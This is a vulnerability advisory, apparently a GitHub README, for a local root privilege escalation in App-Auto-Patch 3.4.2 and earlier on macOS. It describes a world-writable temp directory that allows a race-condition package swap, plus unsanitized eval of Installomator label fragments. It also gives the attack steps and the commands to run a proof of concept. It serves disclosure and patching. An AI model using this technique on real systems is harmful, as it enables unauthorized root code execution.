App-Auto-Patch v3.4.2 creates its working directory with world-writable permissions (chmod 777), enabling a local TOCTOU (time-of-check-time-of-use) race condition. An unprivileged local attacker can exploit this to swap verified packages with malicious ones before installation, achieving arbitrary code execution as root. Additionally, a malicious Installomator label fragment can achieve arbitrary code execution via eval of unsanitized input during label parsing.
- Vulnerable: App-Auto-Patch <= 3.4.2
- Fixed: App-Auto-Patch 3.5.0
Score: 7.8 (High)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
| Metric | Value |
|---|---|
| Attack Vector | Local |
| Attack Complexity | Low |
| Privileges Required | Low |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |
File: App-Auto-Patch-via-Dialog.zsh, line 2525
During installation, appAutoPatchFolder is created with chmod 777. This allows any local user to write, modify, or delete files in the directory.
File: App-Auto-Patch-via-Dialog.zsh, line 4744
Installomator label fragments are parsed using eval without sanitization. Combined with the world-writable directory, an attacker can inject a malicious label fragment that executes arbitrary commands as root.
1. App-Auto-Patch creates appAutoPatchFolder with chmod 777
2. Installomator downloads PKG to world-writable tmpDir, verifies signature
3. ~140 lines of bash execute between verification and installation (RACE WINDOW)
4. Attacker swaps verified PKG with malicious PKG
5. installer -pkg runs attacker's PKG as root
- macOS system with App-Auto-Patch <= 3.4.2 (or any Installomator version using
chmod 777tmpDir) - Unprivileged local user account
- Xcode command line tools (for
pkgbuild)
Terminal 1 (as unprivileged user):
python3 poc.pyTerminal 2 (as root, simulating MDM/admin trigger):
sudo ./simulate-vulnerable-env.shThe PoC monitors /var/tmp for Installomator directories created with chmod 777, then races to swap the legitimate PKG with a malicious one containing a postinstall script that executes as root.
See poc.py and simulate-vulnerable-env.sh for full details.
- Upgrade to App-Auto-Patch 3.5.0 or later
- The fix changes directory permissions from
chmod 777tochmod 755, breaking the attack chain
| Date | Event |
|---|---|
| 2024-12-22 | Vulnerability discovered |
| 2024-12-22 | PoC created |
| 2024-12-22 | PR #202 submitted |
| 2024-12-22 | Issue #203 filed |
| 2025-12-23 | Fixed in App-Auto-Patch 3.5.0 |
| 2026-02-20 | CVE-2025-70341 assigned |
- cooldadhacking (GitHub)
This proof of concept is provided for educational and authorized security testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.